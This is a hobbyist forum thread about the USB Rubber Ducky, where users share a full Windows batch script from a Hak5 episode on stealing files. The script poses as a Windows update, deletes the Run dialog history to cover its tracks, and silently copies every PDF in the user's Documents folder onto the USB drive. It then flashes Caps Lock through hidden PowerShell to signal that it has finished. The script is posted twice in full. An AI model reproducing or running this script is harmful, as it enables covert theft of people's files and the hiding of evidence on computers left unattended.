kerravon Posted December 6, 2016 Share Posted December 6, 2016 Hi all, have the notes from Stealing Files with the USB Rubber Ducky Pt 2 – Hak5 2113 been released yet, very interested in playing with this. Quote Link to comment Share on other sites More sharing options...
Enzym3 Posted December 7, 2016 Share Posted December 7, 2016 Not that I could find, but you can just as easily pause the video at certain times to copy the code yourself. Quote Link to comment Share on other sites More sharing options...
kerravon Posted December 7, 2016 Author Share Posted December 7, 2016 5 hours ago, Enzym3 said: Not that I could find, but you can just as easily pause the video at certain times to copy the code yourself. yeah, but doesnt show complete code Quote Link to comment Share on other sites More sharing options...
Cribbit Posted December 7, 2016 Share Posted December 7, 2016 Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there. e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dislog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2% mkdir %dst% >> nul if Exist %USERPROFILE%\Documents ( REM /C Continues copuing even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted file to destination that does not support encryption. REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file REM /S Copies directories and subdirectories except empty ones. REM /E Copies directories and subdirectories. Including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul ) start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');" I was playing around with the %time% a little so you may want to change them back Quote Link to comment Share on other sites More sharing options...
kerravon Posted December 7, 2016 Author Share Posted December 7, 2016 1 hour ago, Cribbit said: Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there. e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dislog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2% mkdir %dst% >> nul if Exist %USERPROFILE%\Documents ( REM /C Continues copuing even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted file to destination that does not support encryption. REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file REM /S Copies directories and subdirectories except empty ones. REM /E Copies directories and subdirectories. Including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul ) start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');" I was playing around with the %time% a little so you may want to change them back cheers mate your a superstar Quote Link to comment Share on other sites More sharing options...
authorityfinger Posted December 7, 2016 Share Posted December 7, 2016 10 hours ago, kerravon said: yeah, but doesnt show complete code It does. I managed. Quote Link to comment Share on other sites More sharing options...
Cribbit Posted December 8, 2016 Share Posted December 8, 2016 They have released the notes now: Stealing files with the usb rubber ducky usb exfiltration explained Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.